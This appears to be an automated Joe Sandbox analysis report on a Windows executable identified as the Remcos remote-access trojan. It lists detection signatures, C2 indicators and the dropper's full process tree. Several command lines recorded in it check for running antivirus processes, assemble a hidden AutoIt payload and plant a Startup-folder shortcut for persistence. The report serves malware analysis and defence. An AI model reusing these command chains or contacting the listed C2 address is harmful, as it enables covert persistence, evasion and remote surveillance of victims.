Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
94e.exe

Overview

General Information

Sample name:94e.exe
Analysis ID:1579940
MD5:e64509a606fef02334a4b20d3da84ecf
SHA1:4277ab565325593bd91dea95976942f3b636747c
SHA256:94e4256177777422e7ca3282075bb34480c9e235a1c5f3209918abfe1f341697
Infos:

Detection

Remcos
Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Sigma detected: Drops script at startup location
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected Remcos RAT
AI detected suspicious sample
Drops PE files with a suspicious file extension
Installs a global keyboard hook
Sigma detected: WScript or CScript Dropper
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • 94e.exe (PID: 7556 cmdline: "C:\Users\user\Desktop\94e.exe" MD5: E64509A606FEF02334A4B20D3DA84ECF)
    • cmd.exe (PID: 7600 cmdline: "C:\Windows\System32\cmd.exe" /c move Modes Modes.cmd & Modes.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 7680 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 7688 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 7732 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 7740 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 7776 cmdline: cmd /c md 159893 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • extrac32.exe (PID: 7792 cmdline: extrac32 /Y /E Beastiality MD5: 9472AAB6390E4F1431BAA912FCFF9707)
      • findstr.exe (PID: 7816 cmdline: findstr /V "Patrick" Episode MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 7832 cmdline: cmd /c copy /b ..\Proceedings + ..\Deviation + ..\Ds + ..\Lived + ..\Formed + ..\Twiki + ..\Shoot + ..\Retrieval + ..\Pounds + ..\Roland H MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Held.com (PID: 7848 cmdline: Held.com H MD5: 62D09F076E6E0240548C2F837536A46A)
        • cmd.exe (PID: 7880 cmdline: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SecureKey.url" & echo URL="C:\Users\user\AppData\Local\GuardKey Solutions\SecureKey.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SecureKey.url" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • choice.exe (PID: 7864 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • wscript.exe (PID: 8076 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\GuardKey Solutions\SecureKey.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • SecureKey.com (PID: 8120 cmdline: "C:\Users\user\AppData\Local\GuardKey Solutions\SecureKey.com" "C:\Users\user\AppData\Local\GuardKey Solutions\a" MD5: 62D09F076E6E0240548C2F837536A46A)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
No configs have been found
SourceRuleDescriptionAuthorStrings
C:\ProgramData\rmc\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security

    System Summary

    barindex
    Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\GuardKey Solutions\SecureKey.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\GuardKey Solutions\SecureKey.js" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\GuardKey Solutions\SecureKey.js" , ProcessId: 8076, ProcessName: wscript.exe
    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\GuardKey Solutions\SecureKey.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\GuardKey Solutions\SecureKey.js" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\GuardKey Solutions\SecureKey.js" , ProcessId: 8076, ProcessName: wscript.exe

    Data Obfuscation

    barindex
    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 7880, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SecureKey.url

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Source: Process startedAuthor: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Modes Modes.cmd & Modes.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7600, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 7740, ProcessName: findstr.exe
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-12-23T16:21:09.127868+010020365941Malware Command and Control Activity Detected192.168.2.449736101.99.94.642404TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-12-23T16:21:11.706246+010028033043Unknown Traffic192.168.2.449738178.237.33.5080TCP

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: Yara matchFile source: C:\ProgramData\rmc\logs.dat, type: DROPPED
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 87.7% probability
    Source: 94e.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: 94e.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: C:\Users\user\Desktop\94e.exeCode function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
    Source: C:\Users\user\Desktop\94e.exeCode function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\159893Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\159893\Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior

    Networking

    barindex
    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49736 -> 101.99.94.64:2404
    Source: global trafficTCP traffic: 192.168.2.4:49736 -> 101.99.94.64:2404
    Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
    Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
    Source: Joe Sandbox ViewASN Name: SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY
    Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49738 -> 178.237.33.50:80
    Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.64
    Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.64
    Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.64
    Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.64
    Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.64
    Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.64
    Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.64
    Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.64
    Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.64
    Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.64
    Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.64
    Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.64
    Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.64
    Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.64
    Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.64
    Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.64
    Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.64
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
    Source: global trafficDNS traffic detected: DNS query: KPstIEdgjHZZFIeWPSSPTXW.KPstIEdgjHZZFIeWPSSPTXW
    Source: global trafficDNS traffic detected: DNS query: geoplugin.net
    Source: 94e.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
    Source: 94e.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0K
    Source: 94e.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
    Source: 94e.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
    Source: 94e.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
    Source: Held.com, 0000000B.00000003.1772928243.0000000003F6C000.00000004.00000800.00020000.00000000.sdmp, SecureKey.com.11.dr, Held.com.1.dr, Sure.8.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
    Source: Held.com, 0000000B.00000003.1772928243.0000000003F6C000.00000004.00000800.00020000.00000000.sdmp, SecureKey.com.11.dr, Held.com.1.dr, Sure.8.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
    Source: Held.com, 0000000B.00000003.1772928243.0000000003F6C000.00000004.00000800.00020000.00000000.sdmp, SecureKey.com.11.dr, Held.com.1.dr, Sure.8.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
    Source: Held.com, 0000000B.00000003.1772928243.0000000003F6C000.00000004.00000800.00020000.00000000.sdmp, SecureKey.com.11.dr, Held.com.1.dr, Sure.8.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
    Source: Held.com, 0000000B.00000003.1772928243.0000000003F6C000.00000004.00000800.00020000.00000000.sdmp, SecureKey.com.11.dr, Held.com.1.dr, Sure.8.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
    Source: 94e.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
    Source: 94e.exeString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
    Source: 94e.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
    Source: 94e.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
    Source: 94e.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
    Source: 94e.exeString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
    Source: 94e.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
    Source: 94e.exeString found in binary or memory: http://ocsp.digicert.com0
    Source: 94e.exeString found in binary or memory: http://ocsp.digicert.com0A
    Source: 94e.exeString found in binary or memory: http://ocsp.digicert.com0C
    Source: 94e.exeString found in binary or memory: http://ocsp.digicert.com0I
    Source: 94e.exeString found in binary or memory: http://ocsp.digicert.com0X
    Source: Held.com, 0000000B.00000003.1772928243.0000000003F6C000.00000004.00000800.00020000.00000000.sdmp, SecureKey.com.11.dr, Held.com.1.dr, Sure.8.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
    Source: Held.com, 0000000B.00000003.1772928243.0000000003F6C000.00000004.00000800.00020000.00000000.sdmp, SecureKey.com.11.dr, Held.com.1.dr, Sure.8.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
    Source: Held.com, 0000000B.00000003.1772928243.0000000003F6C000.00000004.00000800.00020000.00000000.sdmp, SecureKey.com.11.dr, Held.com.1.dr, Sure.8.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
    Source: Held.com, 0000000B.00000003.1772928243.0000000003F6C000.00000004.00000800.00020000.00000000.sdmp, SecureKey.com.11.dr, Held.com.1.dr, Sure.8.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
    Source: Held.com, 0000000B.00000003.1772928243.0000000003F6C000.00000004.00000800.00020000.00000000.sdmp, SecureKey.com.11.dr, Held.com.1.dr, Sure.8.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
    Source: Held.com, 0000000B.00000003.1772928243.0000000003F6C000.00000004.00000800.00020000.00000000.sdmp, SecureKey.com.11.dr, Held.com.1.dr, Sure.8.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
    Source: Held.com, 0000000B.00000000.1766795524.0000000000B15000.00000002.00000001.01000000.00000007.sdmp, Held.com, 0000000B.00000003.1772928243.0000000003F6C000.00000004.00000800.00020000.00000000.sdmp, SecureKey.com, 00000011.00000000.1885708157.0000000000925000.00000002.00000001.01000000.00000009.sdmp, SecureKey.com.11.dr, Held.com.1.dr, This.8.drString found in binary or memory: http://www.autoitscript.com/autoit3/X
    Source: 94e.exeString found in binary or memory: http://www.digicert.com/CPS0
    Source: 94e.exeString found in binary or memory: http://www.teamviewer.com
    Source: Held.com, 0000000B.00000003.1772928243.0000000003F6C000.00000004.00000800.00020000.00000000.sdmp, SecureKey.com.11.dr, Held.com.1.dr, Sure.8.drString found in binary or memory: https://www.autoitscript.com/autoit3/
    Source: Sure.8.drString found in binary or memory: https://www.globalsign.com/repository/0

    Key, Mouse, Clipboard, Microphone and Screen Capturing

    barindex
    Source: C:\Users\user\AppData\Local\Temp\159893\Held.comWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\159893\Held.comJump to behavior
    Source: C:\Users\user\Desktop\94e.exeCode function: 0_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004050F9
    Source: C:\Users\user\Desktop\94e.exeCode function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1

    E-Banking Fraud

    barindex
    Source: Yara matchFile source: C:\ProgramData\rmc\logs.dat, type: DROPPED

    System Summary

    barindex
    Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\159893\Held.comProcess Stats: CPU usage > 49%
    Source: C:\Users\user\Desktop\94e.exeCode function: 0_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,0_2_004038AF
    Source: C:\Users\user\Desktop\94e.exeFile created: C:\Windows\UnlessMemorabiliaJump to behavior
    Source: C:\Users\user\Desktop\94e.exeFile created: C:\Windows\UpgradesGlennJump to behavior
    Source: C:\Users\user\Desktop\94e.exeFile created: C:\Windows\RidesRepresentationsJump to behavior
    Source: C:\Users\user\Desktop\94e.exeFile created: C:\Windows\ProvenForwardingJump to behavior
    Source: C:\Users\user\Desktop\94e.exeFile created: C:\Windows\ResidentialTranslateJump to behavior
    Source: C:\Users\user\Desktop\94e.exeCode function: 0_2_0040737E0_2_0040737E
    Source: C:\Users\user\Desktop\94e.exeCode function: 0_2_00406EFE0_2_00406EFE
    Source: C:\Users\user\Desktop\94e.exeCode function: 0_2_004079A20_2_004079A2
    Source: C:\Users\user\Desktop\94e.exeCode function: 0_2_004049A80_2_004049A8
    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\GuardKey Solutions\SecureKey.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
    Source: C:\Users\user\Desktop\94e.exeCode function: String function: 004062CF appears 58 times
    Source: 94e.exeStatic PE information: invalid certificate
    Source: 94e.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: 94e.exeStatic PE information: Section: .rsrc ZLIB complexity 0.993720332278481
    Source: classification engineClassification label: mal92.troj.spyw.expl.evad.winEXE@30/31@3/2
    Source: C:\Users\user\Desktop\94e.exeCode function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1
    Source: C:\Users\user\Desktop\94e.exeCode function: 0_2_004024FB CoCreateInstance,0_2_004024FB
    Source: C:\Users\user\AppData\Local\Temp\159893\Held.comFile created: C:\Users\user\AppData\Local\GuardKey SolutionsJump to behavior
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7608:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7888:120:WilError_03
    Source: C:\Users\user\Desktop\94e.exeFile created: C:\Users\user\AppData\Local\Temp\nsr9F2F.tmpJump to behavior
    Source: 94e.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
    Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
    Source: C:\Users\user\Desktop\94e.exeFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Users\user\Desktop\94e.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: C:\Users\user\Desktop\94e.exeFile read: C:\Users\user\Desktop\94e.exeJump to behavior
    Source: unknownProcess created: C:\Users\user\Desktop\94e.exe "C:\Users\user\Desktop\94e.exe"
    Source: C:\Users\user\Desktop\94e.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Modes Modes.cmd & Modes.cmd
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 159893
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Beastiality
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Patrick" Episode
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Proceedings + ..\Deviation + ..\Ds + ..\Lived + ..\Formed + ..\Twiki + ..\Shoot + ..\Retrieval + ..\Pounds + ..\Roland H
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\159893\Held.com Held.com H
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
    Source: C:\Users\user\AppData\Local\Temp\159893\Held.comProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SecureKey.url" & echo URL="C:\Users\user\AppData\Local\GuardKey Solutions\SecureKey.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SecureKey.url" & exit
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\GuardKey Solutions\SecureKey.js"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\GuardKey Solutions\SecureKey.com "C:\Users\user\AppData\Local\GuardKey Solutions\SecureKey.com" "C:\Users\user\AppData\Local\GuardKey Solutions\a"
    Source: C:\Users\user\Desktop\94e.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Modes Modes.cmd & Modes.cmdJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 159893Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E BeastialityJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Patrick" Episode Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Proceedings + ..\Deviation + ..\Ds + ..\Lived + ..\Formed + ..\Twiki + ..\Shoot + ..\Retrieval + ..\Pounds + ..\Roland HJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\159893\Held.com Held.com HJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\159893\Held.comProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SecureKey.url" & echo URL="C:\Users\user\AppData\Local\GuardKey Solutions\SecureKey.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SecureKey.url" & exitJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\GuardKey Solutions\SecureKey.com "C:\Users\user\AppData\Local\GuardKey Solutions\SecureKey.com" "C:\Users\user\AppData\Local\GuardKey Solutions\a"Jump to behavior
    Source: C:\Users\user\Desktop\94e.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\94e.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\Desktop\94e.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\94e.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\Desktop\94e.exeSection loaded: shfolder.dllJump to behavior
    Source: C:\Users\user\Desktop\94e.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\Desktop\94e.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\Desktop\94e.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Users\user\Desktop\94e.exeSection loaded: riched20.dllJump to behavior
    Source: C:\Users\user\Desktop\94e.exeSection loaded: usp10.dllJump to behavior
    Source: C:\Users\user\Desktop\94e.exeSection loaded: msls31.dllJump to behavior
    Source: C:\Users\user\Desktop\94e.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Users\user\Desktop\94e.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Users\user\Desktop\94e.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Users\user\Desktop\94e.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Users\user\Desktop\94e.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Users\user\Desktop\94e.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\94e.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\94e.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\94e.exeSection loaded: textshaping.dllJump to behavior
    Source: C:\Users\user\Desktop\94e.exeSection loaded: profapi.dllJump to behavior
